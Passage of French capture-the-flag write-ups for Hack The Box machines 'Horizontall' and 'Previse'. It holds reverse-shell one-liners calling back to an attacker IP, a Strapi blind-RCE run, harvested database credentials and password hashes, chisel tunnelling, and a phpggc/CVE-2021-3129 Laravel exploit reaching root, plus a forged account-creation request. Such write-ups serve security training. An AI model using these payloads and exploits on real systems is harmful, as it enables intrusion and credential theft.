eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQxMjcyNTQ0LCJleHAiOjE3NDM4NjQ1NDR9.VKjJDQK6JqpNUo7Zsg5plpM2HHmdxLyTboI9kDnixHk </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$&gt; bash -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.19/1337 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Triggering Remote code executin </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Rember this is a blind RCE don<span class="s1">&#39;t expect to see output </span></span></span><span class="line"><span class="cl"><span class="s1">{&#34;statusCode&#34;:400,&#34;error&#34;:&#34;Bad Request&#34;,&#34;message&#34;:[{&#34;messages&#34;:[{&#34;id&#34;:&#34;An error occurred&#34;}]}]} </span></span></span><span class="line"><span class="cl"><span class="s1">$&gt; bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F1337%200%3E%261 </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Triggering Remote code executin </span></span></span><span class="line"><span class="cl"><span class="s1">[*] Rember this is a blind RCE don&#39;</span>t expect to see output </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;statusCode&#34;</span>:400,<span class="s2">&#34;error&#34;</span>:<span class="s2">&#34;Bad Request&#34;</span>,<span class="s2">&#34;message&#34;</span>:<span class="o">[{</span><span class="s2">&#34;messages&#34;</span>:<span class="o">[{</span><span class="s2">&#34;id&#34;</span>:<span class="s2">&#34;An error occurred&#34;</span><span class="o">}]}]}</span> </span></span><span class="line"><span class="cl">$&gt; rm /tmp/f<span class="p">;</span>mkfifo /tmp/f<span class="p">;</span>cat /tmp/f<span class="p">|</span>bash -i 2&gt;<span class="p">&amp;</span>1<span class="p">|</span>nc 10.10.14.19 <span class="m">1337</span> &gt;/tmp/f </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Triggering Remote code executin </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Rember this is a blind RCE don<span class="err">&#39;</span>t expect to see output </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.19<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.105<span class="o">]</span> <span class="m">43406</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1988<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">strapi@horizontall:~/myapi$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">strapi </span></span></code></pre></td></tr></table> </div> </div><h3 id="databasejson---userpassword-for-mysql">database.json - user/password for mysql </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">strapi@horizontall:~/myapi$ grep -rni pass config/ </span></span><span class="line"><span class="cl">config/environments/production/database.json:13: <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;</span><span class="si">${</span><span class="nv">process</span><span class="p">.env.DATABASE_PASSWORD || </span><span class="s1">&#39;&#39;</span><span class="si">}</span><span class="s2">&#34;</span>, </span></span><span class="line"><span class="cl">config/environments/development/database.json:12: <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;#J!:F9Zt2u&#34;</span> </span></span><span class="line"><span class="cl">config/environments/staging/database.json:13: <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;</span><span class="si">${</span><span class="nv">process</span><span class="p">.env.DATABASE_PASSWORD || </span><span class="s1">&#39;&#39;</span><span class="si">}</span><span class="s2">&#34;</span>, </span></span><span class="line"><span class="cl">strapi@horizontall:~/myapi$ config/ </span></span><span class="line"><span class="cl">bash: config/: Is a directory </span></span><span class="line"><span class="cl">strapi@horizontall:~/myapi$ <span class="nb">cd</span> config/ </span></span><span class="line"><span class="cl">strapi@horizontall:~/myapi/config$ <span class="nb">cd</span> environments/development/ </span></span><span class="line"><span class="cl">strapi@horizontall:~/myapi/config/environments/development$ cat database.json </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;defaultConnection&#34;</span>: <span class="s2">&#34;default&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;connections&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;default&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;connector&#34;</span>: <span class="s2">&#34;strapi-hook-bookshelf&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;settings&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;client&#34;</span>: <span class="s2">&#34;mysql&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;database&#34;</span>: <span class="s2">&#34;strapi&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;host&#34;</span>: <span class="s2">&#34;127.0.0.1&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;port&#34;</span>: 3306, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;username&#34;</span>: <span class="s2">&#34;developer&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;#J!:F9Zt2u&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;options&#34;</span>: <span class="o">{}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="mysql---nothing-interesting">mysql - nothing interesting </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ptrapi@horizontall:~/myapi/config/environments/development$ mysql -u developer - </span></span><span class="line"><span class="cl">Enter password: </span></span><span class="line"><span class="cl">Welcome to the MySQL monitor. Commands end with <span class="p">;</span> or <span class="se">\g</span>. </span></span><span class="line"><span class="cl">Your MySQL connection id is <span class="m">29</span> </span></span><span class="line"><span class="cl">Server version: 5.7.35-0ubuntu0.18.04.1 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> 2000, 2021, Oracle and/or its affiliates. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Oracle is a registered trademark of Oracle Corporation and/or its </span></span><span class="line"><span class="cl">affiliates. Other names may be trademarks of their respective </span></span><span class="line"><span class="cl">owners. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Type <span class="s1">&#39;help;&#39;</span> or <span class="s1">&#39;\h&#39;</span> <span class="k">for</span> help. Type <span class="s1">&#39;\c&#39;</span> to clear the current input statement. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; use strapi<span class="p">;</span> </span></span><span class="line"><span class="cl">Reading table information <span class="k">for</span> completion of table and column names </span></span><span class="line"><span class="cl">You can turn off this feature to get a quicker startup with -A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database changed </span></span><span class="line"><span class="cl">mysql&gt; show tables<span class="p">;</span> </span></span><span class="line"><span class="cl">+------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Tables_in_strapi <span class="p">|</span> </span></span><span class="line"><span class="cl">+------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> core_store <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> reviews <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> strapi_administrator <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> upload_file <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> upload_file_morph <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> users-permissions_permission <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> users-permissions_role <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> users-permissions_user <span class="p">|</span> </span></span><span class="line"><span class="cl">+------------------------------+ </span></span><span class="line"><span class="cl"><span class="m">8</span> rows in <span class="nb">set</span> <span class="o">(</span>0.00 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mysql&gt; <span class="k">select</span> * from strapi_administrator<span class="p">;</span> </span></span><span class="line"><span class="cl">+----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> id <span class="p">|</span> username <span class="p">|</span> email <span class="p">|</span> password <span class="p">|</span> resetPasswordToken <span class="p">|</span> blocked <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3</span> <span class="p">|</span> admin <span class="p">|</span> admin@horizontall.htb <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$bPZbunuhF9lWrddSuw3RI</span>.QmCitfZDJmwbB0WozXlxT2siCwanVVK <span class="p">|</span> NULL <span class="p">|</span> NULL <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+-----------------------+--------------------------------------------------------------+--------------------+---------+ </span></span><span class="line"><span class="cl"><span class="m">1</span> row in <span class="nb">set</span> <span class="o">(</span>0.00 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ^^^ </span></span><span class="line"><span class="cl"> <span class="o">||</span><span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span><span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="o">||</span><span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> THIS IS OUR PASSWORD THAT WE HAVE DEFINED... </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="laravel-port-8000">Laravel port 8000 </h3><p>On découvre qu&rsquo;un service tourne sur le port 8000, il s&rsquo;agit du framework laravel. Dans un premier temps, il a fallu faire du port forwarding afin d&rsquo;avoir plus d&rsquo;informations.</p> <h3 id="chisel">Chisel </h3><p>On fait du port forwarding avec chisel pour dupliquer sur ma kali le port 8000 de la machine cible. On découvre ensuite qu&rsquo;il s&rsquo;agit du framework laravel qui se cache derriere.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ./chisel server -p <span class="m">1082</span> --reverse </span></span><span class="line"><span class="cl">2025/03/06 10:36:18 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/03/06 10:36:18 server: Fingerprint <span class="nv">GadUpp2bJ5QyhTVJpJx1RJ3JnbEW0HpdrGb1bHRNevo</span><span class="o">=</span> </span></span><span class="line"><span class="cl">2025/03/06 10:36:18 server: Listening on http://0.0.0.0:1082 </span></span><span class="line"><span class="cl">2025/03/06 10:36:20 server: session#1: tun: proxy#R:8000<span class="o">=</span>&gt;localhost:8000: Listening </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"><span class="c1">## Sur la machine cible</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ./chisel client 10.10.14.19:1082 R:8000:localhost:8000 &gt; /dev/null 2&gt; /dev/null <span class="p">&amp;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="laravel--cve-2021-3129">Laravel : CVE-2021-3129 </h3><p><a class="link" href="https://nvd.nist.gov/vuln/detail/cve-2021-3129" target="_blank" rel="noopener" >https://nvd.nist.gov/vuln/detail/cve-2021-3129</a> On doit générer un fichier phar qui permettra d&rsquo;executer une commande en particulier. Ensuite, on peut exploiter laravel en passant au fichier python le fichier phar.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall/laravel-exploits/phpggc<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 ./laravel-ignition-rce.py </span></span><span class="line"><span class="cl">Usage: ./laravel-ignition-rce.py &lt;url&gt; &lt;/path/to/exploit.phar&gt; <span class="o">[</span>log_file_path<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Generate your PHAR using PHPGGC, and add the --fast-destruct flag <span class="k">if</span> you want to see your command<span class="s1">&#39;s result. The Monolog/RCE1 GC works fine. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">Example: </span></span></span><span class="line"><span class="cl"><span class="s1"> $ php -d&#39;</span>phar.readonly<span class="o">=</span>0<span class="err">&#39;</span> ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id </span></span><span class="line"><span class="cl"> $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit---gaining-root-shell">Exploit - gaining root shell </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall/laravel-exploits/<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ git clone https://github.com/ambionics/phpggc.git<span class="p">;</span> <span class="nb">cd</span> phpggc </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## On génère le fichier phar qui executera la commande &#34;id&#34;</span> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall/laravel-exploits/phpggc<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ php -d<span class="s1">&#39;phar.readonly=0&#39;</span> ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system <span class="s2">&#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc 10.10.14.19 6666 &gt;/tmp/f&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall/laravel-exploits/phpggc<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">cd</span> .. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Horizontall/laravel-exploits<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar </span></span><span class="line"><span class="cl">+ Log file: /home/developer/myproject/storage/logs/laravel.log </span></span><span class="line"><span class="cl">+ Logs cleared </span></span><span class="line"><span class="cl">+ Successfully converted to PHAR ! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">6666</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">6666</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.19<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.105<span class="o">]</span> <span class="m">54562</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>25151<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">root@horizontall:/home/developer/myproject/public# whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@horizontall:/home/developer/myproject/public# cat /root/root.txt </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">a901e.....5a11 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/previse-htb/Thu, 06 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/previse-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Previse cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Previse</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.104</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">m4lwhere:ilovecody112235! </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv 10.10.11.104 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbdbnxQupSPdfuEywpVV7Wp3dHqctX3U+bBa/UyMNxMjkPO+rL5E6ZTAcnoaOJ7SK8Mx1xWik7t78Q0e16QHaz3vk2AgtklyB+KtlH4RWMBEaZVEAfqXRG43FrvYgZe7WitZINAo6kegUbBZVxbCIcUM779/q+i+gXtBJiEdOOfZCaUtB0m6MlwE2H2SeID06g3DC54/VSvwHigQgQ1b7CNgQOslbQ78FbhI+k9kT2gYslacuTwQhacntIh2XFo0YtfY+dySOmi3CXFrNlbUc2puFqtlvBm3TxjzRTxAImBdspggrqXHoOPYf2DBQUMslV9prdyI6kfz9jUFu2P1Dd </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCnDbkb4wzeF+aiHLOs5KNLPZhGOzgPwRSQ3VHK7vi4rH60g/RsecRusTkpq48Pln1iTYQt/turjw3lb0SfEK/4<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span> http-cookie-flags: </span></span><span class="line"><span class="cl"><span class="p">|</span> /: </span></span><span class="line"><span class="cl"><span class="p">|</span> PHPSESSID: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ httponly flag not <span class="nb">set</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-title: Previse Login </span></span><span class="line"><span class="cl"><span class="p">|</span>_Requested resource was login.php </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="website-with-bad-redirection">Website with bad redirection </h3><p>Le site web nous empeche de voir certaines pages et nous demande de nous authentifier sur la page de login.php. Cependant, on observe qu&rsquo;en vérité on recoit quand meme le code source de la page, avant d&rsquo;etre redirigé ! On peut donc capturer la plupart des pages, detecter avec gobuster, et les ouvrir dans burp. Ensuite, on a acces a une page sur lequel on peut créer un compte. On forge donc une requete POST depuis burp pour créer un nouveau compte. Enfin, on peut se connecter de manière classique sur le site web avec notre nouveau compte</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /accounts.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.10.11.104 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,image/png,image/svg+xml,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">51</span> </span></span><span class="line"><span class="cl">Origin: http://10.10.11.104 </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://10.10.11.104/login.php </span></span><span class="line"><span class="cl">Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>u7bqrqlp12dv65ple4ev2q1glr </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">username</span><span class="o">=</span>leopold<span class="p">&amp;</span><span class="nv">password</span><span class="o">=</span>password<span class="p">&amp;</span><span class="nv">confirm</span><span 